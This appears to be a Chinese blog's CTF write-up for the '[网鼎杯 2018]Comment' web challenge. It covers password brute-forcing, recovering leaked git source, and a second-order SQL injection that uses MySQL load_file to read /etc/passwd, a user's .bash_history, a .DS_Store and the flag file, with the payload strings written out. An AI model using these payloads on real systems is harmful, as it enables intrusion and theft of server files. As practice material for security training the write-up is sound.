<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.21.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="先随便写点东西 发现要我们登录  直接爆破密码最后三位即可 发现是666 所以登录上去 之后对各个地方尝试sql注入，都失败了，所以换一个思路 扫描一下目录发现git泄露，githacker找到源码 但是  不是完全的。 所以在githacker得到的文件中进行回复 git log --reflog  会发现很多  我们一个个试，最后可以得到完整代码 &lt;?phpinclude &quot;m">
<meta property="og:type" content="article">
<meta property="og:title" content="[网鼎杯 2018]Comment">
<meta property="og:url" content="http://example.com/2024/06/16/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/%E7%BD%91%E9%BC%8E%E6%9D%AF-2018-Comment/index.html">
<meta property="og:site_name" content="why">
<meta property="og:description" content="先随便写点东西 发现要我们登录  直接爆破密码最后三位即可 发现是666 所以登录上去 之后对各个地方尝试sql注入，都失败了，所以换一个思路 扫描一下目录发现git泄露，githacker找到源码 但是  不是完全的。 所以在githacker得到的文件中进行回复 git log --reflog  会发现很多  我们一个个试，最后可以得到完整代码 &lt;?phpinclude &quot;m">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161557200.png">
<meta property="og:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161641956.png">
<meta property="og:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161643191.png">
<meta property="og:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161701395.png">
<meta property="og:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161701206.png">
<meta property="og:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161701781.png">
<meta property="og:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161702672.png">
<meta property="article:published_time" content="2024-06-16T07:21:52.000Z">
<meta property="article:modified_time" content="2024-06-16T09:14:57.202Z">
<meta property="article:author" content="why">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161557200.png">


<link rel="canonical" href="http://example.com/2024/06/16/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/%E7%BD%91%E9%BC%8E%E6%9D%AF-2018-Comment/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2024/06/16/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/%E7%BD%91%E9%BC%8E%E6%9D%AF-2018-Comment/","path":"2024/06/16/buu刷题集-web/网鼎杯-2018-Comment/","title":"[网鼎杯 2018]Comment"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>[网鼎杯 2018]Comment | why</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">why</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">疯疯癫癫的小辣鸡</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-overview-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">why</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">120</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/06/16/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/%E7%BD%91%E9%BC%8E%E6%9D%AF-2018-Comment/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="why">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="why">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="[网鼎杯 2018]Comment | why">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [网鼎杯 2018]Comment
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2024-06-16 15:21:52 / 修改时间：17:14:57" itemprop="dateCreated datePublished" datetime="2024-06-16T15:21:52+08:00">2024-06-16</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>先随便写点东西</p>
<p>发现要我们登录</p>
<p><img src="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161557200.png" alt="image-20240616155446636"></p>
<p>直接爆破密码最后三位即可</p>
<p>发现是666</p>
<p>所以登录上去</p>
<p>之后对各个地方尝试sql注入，都失败了，所以换一个思路</p>
<p>扫描一下目录发现git泄露，githacker找到源码</p>
<p>但是</p>
<p><img src="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161641956.png" alt="在这里插入图片描述"></p>
<p>不是完全的。</p>
<p>所以在githacker得到的文件中进行回复</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git log --reflog</span><br></pre></td></tr></table></figure>

<p>会发现很多</p>
<p><img src="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161643191.png" alt="image-20240616164302160"></p>
<p>我们一个个试，最后可以得到完整代码</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &quot;mysql.php&quot;;</span><br><span class="line">session_start();</span><br><span class="line">if($_SESSION[&#x27;login&#x27;] != &#x27;yes&#x27;)&#123;</span><br><span class="line">    header(&quot;Location: ./login.php&quot;);</span><br><span class="line">    die();</span><br><span class="line">&#125;</span><br><span class="line">if(isset($_GET[&#x27;do&#x27;]))&#123;</span><br><span class="line">switch ($_GET[&#x27;do&#x27;])</span><br><span class="line">&#123;</span><br><span class="line">case &#x27;write&#x27;:</span><br><span class="line">    $category = addslashes($_POST[&#x27;category&#x27;]);</span><br><span class="line">    $title = addslashes($_POST[&#x27;title&#x27;]);</span><br><span class="line">    $content = addslashes($_POST[&#x27;content&#x27;]);</span><br><span class="line">    $sql = &quot;insert into board</span><br><span class="line">            set category = &#x27;$category&#x27;,</span><br><span class="line">                title = &#x27;$title&#x27;,</span><br><span class="line">                content = &#x27;$content&#x27;&quot;;</span><br><span class="line">    $result = mysql_query($sql);</span><br><span class="line">    header(&quot;Location: ./index.php&quot;);</span><br><span class="line">    break;</span><br><span class="line">case &#x27;comment&#x27;:</span><br><span class="line">    $bo_id = addslashes($_POST[&#x27;bo_id&#x27;]);</span><br><span class="line">    $sql = &quot;select category from board where id=&#x27;$bo_id&#x27;&quot;;</span><br><span class="line">    $result = mysql_query($sql);</span><br><span class="line">    $num = mysql_num_rows($result);</span><br><span class="line">    if($num&gt;0)&#123;</span><br><span class="line">    $category = mysql_fetch_array($result)[&#x27;category&#x27;];</span><br><span class="line">    $content = addslashes($_POST[&#x27;content&#x27;]);</span><br><span class="line">    $sql = &quot;insert into comment</span><br><span class="line">            set category = &#x27;$category&#x27;,</span><br><span class="line">                content = &#x27;$content&#x27;,</span><br><span class="line">                bo_id = &#x27;$bo_id&#x27;&quot;;</span><br><span class="line">    $result = mysql_query($sql);</span><br><span class="line">    &#125;</span><br><span class="line">    header(&quot;Location: ./comment.php?id=$bo_id&quot;);</span><br><span class="line">    break;</span><br><span class="line">default:</span><br><span class="line">    header(&quot;Location: ./index.php&quot;);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    header(&quot;Location: ./index.php&quot;);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>发现了，当do&#x3D;comment时，我们可以从category里进行查询</p>
<p>所以我们可以进行sql注入</p>
<p>content变量在留言界面中</p>
<p>我们发现<br>    $sql &#x3D; “insert into comment<br>            set category &#x3D; ‘$category’,<br>                content &#x3D; ‘$content’,<br>                bo_id &#x3D; ‘$bo_id’”;<br>他是分行的，所以#,–+不能用了，得使用&#x2F;**&#x2F;多行注释(好像%00截断也行，没有试过)<br>构造:$category:’ content&#x3D;(语句),&#x2F;*<br>    $content:*&#x2F;#</p>
<p>所以我们</p>
<p>1.在发帖页面写入’,content&#x3D;(user()),&#x2F;*</p>
<p>2.之后留言,内容为:*&#x2F;#   得知是root权限<br>这里要注意：查数据库的数据不需要root权限，而使用load_file读取文件内容需要root权限，所以应该是想让我们读取文件(查数据的我也尝试过，什么都没有)</p>
<p>3.尝试读文件（步骤一样的我就不截图了），有些wp 的load_file前面加了select，因为数据库查找留言内容时前面已经加了select，所以可以不用加select</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&#x27;,content=(load_file(&quot;/etc/passwd&quot;)),/*</span><br><span class="line">*/#</span><br></pre></td></tr></table></figure>

<p>得到</p>
<p><img src="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161701395.png" alt="在这里插入图片描述"></p>
<p>发现出来root用户以外，只有www这个用户在&#x2F;home&#x2F;www目录下用了&#x2F;bin&#x2F;bash</p>
<p>4.查看&#x2F;home&#x2F;www&#x2F;.bash_history<br>.bash_history ：保存了当前用户使用过的历史命令,方便查找</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&#x27;,content=(load_file(&quot;/home/www/.bash_history&quot;)),/*</span><br><span class="line">*/#</span><br></pre></td></tr></table></figure>

<p>得到</p>
<p><img src="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161701206.png" alt="在这里插入图片描述"></p>
<p>解释一下：先进入&#x2F;tmp目录,解压缩了html.zip文件(得到&#x2F;tmp&#x2F;html)，之后将html.zip删除了，拷贝了一份html给了&#x2F;var&#x2F;www目录(得到&#x2F;var&#x2F;www&#x2F;html)，之后将&#x2F;var&#x2F;www&#x2F;html下的.DS_Store文件删除，但是&#x2F;tmp&#x2F;html下的.DS_Store文件没有删除,查看一下<br>unzip:解压缩<br>.DS_Store:这个文件是常见的备份文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&#x27;,content=(load_file(&quot;/tmp/html/.DS_Store&quot;)),/*</span><br><span class="line">*/#</span><br></pre></td></tr></table></figure>

<p>得到</p>
<p><img src="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161701781.png" alt="在这里插入图片描述"></p>
<p>内容还挺长的,查看源码复制,放在burpsuite里面进行ASCII hex 解码<br>得到</p>
<p><img src="https://raw.githubusercontent.com/201001why/image/master/PicGo/202406161702672.png" alt="在这里插入图片描述"></p>
<p>看到里面有flag_8946e1ff1ee3e40f.php</p>
<p>产生查看</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&#x27;,content=(hex(load_file(&quot;/var/www/html/flag_8946e1ff1ee3e40f.php&quot;))),/*</span><br><span class="line">*/#</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/06/16/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/NPUCTF2020-ezinclude/" rel="prev" title="[NPUCTF2020]ezinclude">
                  <i class="fa fa-angle-left"></i> [NPUCTF2020]ezinclude
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/06/16/buu%E5%88%B7%E9%A2%98%E9%9B%86-web/HarekazeCTF2019-encode-and-encode/" rel="next" title="[HarekazeCTF2019]encode_and_encode">
                  [HarekazeCTF2019]encode_and_encode <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">why</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
